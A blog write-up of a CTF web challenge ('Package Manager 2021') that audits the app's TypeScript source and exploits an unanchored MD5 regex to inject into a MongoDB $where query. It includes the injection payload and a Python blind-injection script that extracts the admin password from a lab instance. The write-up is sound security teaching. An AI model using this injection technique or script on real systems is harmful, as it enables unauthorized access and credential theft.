[2021祥云杯]Package Manager 2021

最新推荐文章于 2024-08-26 17:03:22 发布
最新推荐文章于 2024-08-26 17:03:22 发布
阅读量88 收藏
点赞数
文章标签: ubuntu linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64348326/article/details/132110165
版权

[2021祥云杯]Package Manager 2021

1.下载附件,查看源码,语言是TypeScript,基于javascript类型拓展的超集,大概语法也和Node.js类似。直接打开网页,配合功能点来审计关键点。

2.首先就是ini_db.ts文件,里面记载了flag的存放位置,就是保存到了package数据库中:

        const flag = {
            "user_id": admin.id,
            "pack_id": genPackageId(admin.id),
            "name": "Flag is here",
            "description": process.env.FLAG,
            "version": "1.0.1"
        }
        let pack = new Package(flag);
        await pack.save();

2.打开页面就是一个注册、登陆的功能点 ,在index.ts中相应的实现源码如下,大概意思就是register功能实例化一个User数据库对象,并将输入的数据进行查找判断并注册保存,然后跳转到login功能,利用用户名来查找user,然后对密码进行判断,然后设置session

router.get('/login', (_, res) => res.render('login'))

router.post('/login', async (req, res) => {
	let { username, password } = req.body;
	if (username && password) {
		if (username == '' || typeof (username) !== "string" || password == '' || typeof (password) !== "string") {
			return res.render('login', { error: 'Parameters error' });
		}
		const user = await User.findOne({ "username": username })
		if (!user || !(user.password === password)) {
			return res.render('login', { error: 'Invalid username or password' });
		}
		req.session.userId = user.id
		res.redirect('/packages/list')
	} else {
		return res.render('login', { error: 'Parameters cannot be blank' });
	}
})

router.get('/register', (_, res) => res.render('register'))

router.post('/register', async (req, res) => {
	let { username, password, password2 } = req.body;
	if (username && password && password2) {
		if (username == '' || typeof (username) !== "string" || password == '' || typeof (password) !== "string" || password2 == '' || typeof (password2) !== "string") {
			return res.render('register', { error: 'Parameters error' });
		}
		if (password != password2) {
			return res.render('register', { error: 'Password do noy match' });
		}
		if (await User.findOne({ username: username })) {
			return res.render('register', { error: 'Username already taken' });
		}
		try {
			const user = new User({ "username": username, "password": password, "isAdmin": false })
			await user.save()
		} catch (err) {
			return res.render('register', { error: err });
		}
		res.redirect('/login');
	} else {
		return res.render('register', { error: 'Parameters cannot be blank' });
	}
})

3.然后进入到后台,也可以查看一下具体功能代码分析,例如初始界面给出了介绍:欢迎来到软件包管理站点,尝试努力创建自己的包并将其提交给管理员。

image-20230804162928552

4.进去后就会进入渲染testUser用户的package的管理界面,这个是可以在初始化的文件中看得见的。大概package包含user_id(登陆的用户id)、pack_id(根据用户id等等计算的)、name(包名)、description(包描述)、version(包版本)。由于我们的用户没有包数据,那么就会自动渲染testUser的包数据,否则进入/list路由,渲染自己的包数据:

router.get('/list', async (req, res, next) => {
	const packs = await Package.find({ user_id: req.session.userId });
	if (packs.length == 0) {
		return res.redirect('/packages');
	}
	let { search } = req.query;
	if (search) {
		try {
			let description = search;
			let name = search;
			if (typeof description === 'string') {
				description = { description };
			}
			if (typeof name === 'string') {
				name = { name };
			}
			const packs = await Package.find({
				user_id: req.session.userId,
				$or: [name, description],
			});
			if (packs.length == 0) {
				return next(createError(404));
			}
			return res.render('packages', { packs });
		} catch (err) {
			return next(createError(500))
		}
	}
	return res.render('packages', { packs });
});

5.剩下的/add路由,添加包数据到package数据库;/:id/edit路由,修改对应pack_id的包数据;/:id/delete,删除对应pack_id的包。代码就不放了,到这里就已经解释了schema.ts文件中定义的两个数据库了,分别是User、Package。还剩一个Report数据库就是重点了。

6.下面这段代码,是/submit的功能实现,虽然两个功能不在同一个文件,但是是联通性的。当我们通过/auth认证以后成功,就能通过/submit来将我们的包名pack_id保存到Report数据库中,也就是下面要执行的操作。

router.get('/submit', checkAuth, (_, res) => res.render('submit'));

router.post('/submit', checkAuth, async (req, res) => {
	let { pack_id } = req.body;
	if (!checkmd5Regex(pack_id)) {
		return res.render('submit', {
			error: 'Package id must be valid md5 string',
		});
	}
	try {
		const report = new Report({ pack_id: pack_id });
		await report.save();
		return res.render('submit', { message: 'Package successfully submitted' });
	} catch (err) {
		return res.render('submit', { error: 'Already submit your package' });
	}
});

7.后面就是一个已经登陆了管理员账号的bot,它会每隔5s访问一遍在Report数据库中上传的包/packages/${id}路径。

 try {
        const page = await browser.newPage();
        page.on('dialog', async dialog => {
            await dialog.accept();
        });
        console.log('Working');
        await page.goto(new URL('/login', base).toString());
        await page.type('#username', 'admin');
        await page.type('#password', process.env.ADMIN_PASSWORD);
	await Promise.all([page.waitForNavigation(), page.click('#submit')]);

	console.log(`Checking packages ${id}`)
        await page.goto(new URL(`/packages/${id}`, base).toString());
        await timeout(TIMEOUT * 4);

    } catch (err) {
        console.log(err)
    } finally {
        await browser.close()
    }

8.那么思路到这就清晰了,首先是管理员它会创建一个带有flag数据的包,然后我们就需要构造恶意窃取cookie的包,然后通过auth的校验,最后传递包名到Report数据库,并且让管理员机器人访问,得到cookie,替换登陆即可在包管理界面查看到flag

9.那么,第一步要干的事情就是测试含有xss的包,很遗憾有转义,那就没办法了。那就只能看向/auth路由了,因为就算是没有转义,也得需要通过认证,才能传递数据包:

router.get('/auth', (_, res) => res.render('auth'))

router.post('/auth', async (req, res) => {
	let { token } = req.body;
	if (token !== '' && typeof (token) === 'string') {
		if (checkmd5Regex(token)) {
			try {
				let docs = await User.$where(`this.username == "admin" && hex_md5(this.password) == "${token.toString()}"`).exec()
				console.log(docs);
				if (docs.length == 1) {
					if (!(docs[0].isAdmin === true)) {
						return res.render('auth', { error: 'Failed to auth' })
					}
				} else {
					return res.render('auth', { error: 'No matching results' })
				}
			} catch (err) {
				return res.render('auth', { error: err })
			}
		} else {
			return res.render('auth', { error: 'Token must be valid md5 string' })
		}
	} else {
		return res.render('auth', { error: 'Parameters error' })
	}
	req.session.AccessGranted = true
	res.redirect('/packages/submit')
});

10.这里就指明了用户名必须是adminpassword就是我们POST传递的token参数,然后执行语句获得的结果要为真。那么,注意的是checkmd5Regex()方法校验我们传递的token,这里跟进一下util.ts文件,查看该方法:

const checkmd5Regex = (token: string) => {
  return /([a-f\d]{32}|[A-F\d]{32})/.exec(token);
}

11.可以发现,上面是以一个正则匹配大小写和数字一共32位,两种模式的,但是由于没有加^$进行语句开头结尾限定,那就说明它只匹配前32位的字母要符合模式就行,后面就能构造任意的语句。因为继续往上查看,它在执行语句时,会将我们输入的token进行拼接,然后再判断的。那么我们知道了管理员用户名admin,再注入出密码,不就可以登陆账号查看flag了吗?

12.一开始在schema.ts文件中,就能得到数据库类型为mangodb,刚好能用它的特性盲注MongoDB特性注入来得到密码,构造payload:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"||this.password[1]=="a

13.然后,利用python脚本跑出管理员密码,这里跑的时候也遇到了一些问题,那就是post中的直接跳转allow_redirects要为假,否则跑不出结果:

import requests

pwd = ""
url = "http://dd1824b4-753b-442f-bfec-6db89a8b5fcd.node4.buuoj.cn:81/auth"
dict = "!@#$%^&(){}*/|abcdefghijklmnopqrstuvwxyz0123456789.',?"
header = {
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0",
    "cookie":"session=s:ZHO_3HolPc0BWEJvCYZXchC_JCZVaaNU.t/5aohGDiIJLWRg+Eoqs0XSVg5gUyO8Pgr4HpZTGhyM",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
}

for i in range(50):
    for j in dict:
        payload = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"||this.password[{}]=="{}'.format(i,j)
        #print(payload)
        data = {
            "_csrf":"Y8aq904k-FkpeSmten96FaD8M2Ri2Ls8CeMw",
            "token": payload
        }
        res = requests.post(url=url,headers=header,data=data,allow_redirects=False)
        #print(res.text)
        if "Redirecting" in res.text:
            pwd+=j
            print(pwd)
            break

总结

这道题确实可能有点问题,因为真要按照上面代码审计的操作,应该是窃取管理员cookie,这部分可能是非预期解。

光迹ovo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ctf misc][2021祥云初赛]层层取证
ShenZ的博客
08-23 2531
呜呜写博客以来第一次线上做出题目了 [2021祥云初赛]层层取证 附件: Forensic_9b23172e1dba502daa656b8d4234897f.rar 内含win7x64电脑镜像和内存镜像disk_image.rar,memdump.rar 1.初步分析 disk_image 首先取证大师 得到xiaoming用户NT密码哈希值:92efa7f9f2740956d51157f46521f941,cmd5网站在线解密(是付费的) 在xiaoming账户的桌面上可以看到叫flag.txt
WP-2021祥云
ce666666的博客
01-16 677
前言 好多审计题,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的题目赛后加强学习知识点,盲看没什么用。 链接 复现平台:https://buuoj.cn/ 参考大佬博客:https://www.anquanke.com/post/id/251221 WEB ezyii 这题就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。  代码 <?php namespace Codeception\Extension{ u
祥云2021 Web复现
feng的博客
08-25 1873
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
2021祥云
qq_48511129的博客
12-13 1070
安全检测 尝试用admin/admin登录,发现成功登录 输入一个百度的地址,发现跳转到了百度。 于是尝试能不能跳转到本地http://127.0.0.1发现无法跳转 网站很多都有一个admin后台目录,接着尝试能不能跳转到该目录 发现成功跳转 看到include123.php文件,于是接着跳转到该文件下面 发现了一些php代码 发现对get传的参数过滤了很多东西。本地文件包含,远程文件包含命令执行等基本都过滤了。 暑假做题的时候做到了一道类似的题,把这些都过滤了,他用的方法是用session文件包含,因为
[2021东华]Web Writeup
feng的博客
11-01 3612
EzGadget 给了源码,IDEA打开看看,有个反序列化的点: @ResponseBody @RequestMapping({"/readobject"}) public String unser(@RequestParam(name = "data",required = true) String data, Model model) throws Exception { byte[] b = Tools.base64Decode(data); I
buu-day05
anwen12的博客
01-03 715
0x01 [NPUCTF2020]验证???? str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '') 第一步是一个弱类型比较,下面有两个常用的比较方式 a[]=a&b[]=a a='1' &b=[1] 注意第二种方式必须使用json格式进行传输,不然[1]会被解析成为字符串。很显然这里使用第二种。 第二步就是研究上面这个正则表达式了。一共分为3个
祥云2021题目汇总 祥云.7z
08-31
祥云2021题目汇总 祥云.7z
2020祥云 CTFNu1L.pdf
03-15
根据提供的文件内容,我们可以提炼出以下几个关键知识点: 1. RAR伪加密:这是一种常见的加密方法,它通过修改文件头的方式来欺骗解压缩软件,使其认为文件已经被加密。实际上文件并没有加密,只是通过改变文件头...
wmctf2021 Flag Thief && 祥云 层层取证 && 陇剑 wifi && 羊城 辣鸡取证
weixin_45805993的博客
09-18 794
0x00我是菜鸡 这题算是做过的取证题里很复杂的了,拿出来复现一下 大部分内容参考了套神的博客,先贴在上面 https://blog.csdn.net/qq_42880719/article/details/120000111 0x01题解 因为没有取证大师,我这里先选择了用FTK挂载镜像 Hint:曾远程过其他电脑 从大神的博客学到这里大概有几种思路 1.default.rdp文件 2.注册表搜索Terminal Server Client 3.BMC 与bin缓存文件,可缓存远程桌面图片,文件位置:%
[Linux]在Ubuntu中安装samba并且正确配置(详细)
c858845275的博客
08-23 1071
讲述了samba的安装配置与连接以及最基本的错误解决办法。
Ubuntu 22.04中MySQL 8 设置忽略大小写
qiaofan_乔凡的博客
08-23 331
在进行第9步骤时出现文件已经存在了 你是不是要替换 输入N即可 不替换。
Ubuntu 中 SSH 服务的配置与原理详解
码农研究僧的博客
08-24 1017
一种用于在不安全的网络上安全登录和执行命令的协议 通过加密的方式保护通信数据,确保在传输过程中不被窃取或篡改 SSH 常用于远程登录服务器、传输文件以及执行命令
Ubuntu2004编译VLC-QT(记录)(根据官方步骤来)
最新发布
weixin_53000184的博客
08-26 806
Ubuntu2004编译VLC-QT(根据官方步骤来)
Ubuntu 22.04 中将 Pycharm.desktop 文件标记为可信的步骤
い天然呆的博客
08-23 277
Ubuntu 22.04 中,当你创建或下载了一个 .desktop 文件(例如用来启动 PyCharm 的 Pycharm.desktop 文件)时,系统可能会弹出一个对话框提示“Untrusted Desktop File”(不可信的桌面文件),并阻止你启动该文件。虽然提示中建议右键点击文件并选择“Allow Launching”(允许启动),但有时右键菜单中并不会显示这一选项。针对这种情况,可以按照以下步骤解决问题。
20240823给飞凌OK3588-C的核心板刷Ubuntu22.04并成功启动
南岭笑笑生之家
08-23 774
给飞凌OK3588-C的核心板刷Ubuntu22.04,不管是预编译的,还是你自己直接编译的IMG固件。就像Linux R4/Buildroot一样,需要修改DTS关闭PCIE30才能正常启动的!20240823给飞凌OK3588-C的核心板刷Ubuntu22.04并成功启动。扩展安全维护(ESM)Applications 未启用。启用 ESM Apps 来获取未来的额外安全更新。放心,都会卡死在这里的!0 更新可以立即应用。
ESP32-IDF 在 Ubuntu 下的配置
Teminator_的博客
08-23 3795
参考资料:官方文档:Linux 和 macOS 平台工具链的标准设置。参照官方文档,首先下载编译 所需要的软件包: 二、获取 ESP-IDF 首先创建一个目录用来作为 esp32 的工作目录: 为了解决国内开发者从 Github 克隆 esp 相关仓库慢的问题,官方已将 esp-idf 和部分重要仓库及其关联的子模块镜像到了 jihu,这些仓库将自动从原始仓库进行同步。所以先获取官方的工具:(相关信息见 乐鑫开源/esp-gitee-tools) 使用如下命令即可使用镜像的 URL: 然后就可以克隆远程仓
Ubuntu 20.04 源码编译安装OpenCV 4.5.0
coco的专栏
08-26 130
源码安装 OpenCV 4.5。
Ubuntu 22.04 某次重启后nvidia-smi 失效
qq_43526015的博客
08-23 195
由于重启后ubuntu内核自动更新,导致内核雨当前驱动版本不匹配,因此切换首选内核至上一版本即可。将 0 修改为你想要的内核所在顺序,如 “1> n”, n前面有空格。框线所示即为启动顺序(我已调整,因此首选启动内核版本为6.5.0)确定想要启动的内核版本顺序,如6.5.0为第二个。尝试解决之后发现效果不大,就放弃了。最后reboot就可以了。查看服务器启动内核的顺序。
2020祥云CTF挑战解析:进制翻转与图像恢复
"2020祥云网络安全竞赛的CTF(Capture The Flag)Write-up,高清PDF版本,包含了赛事中的各种挑战解决方案,主要涉及Miscellaneous(杂项)类问题,包括进制转换、音频处理、文件恢复等技术。" 在2020年的祥云...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值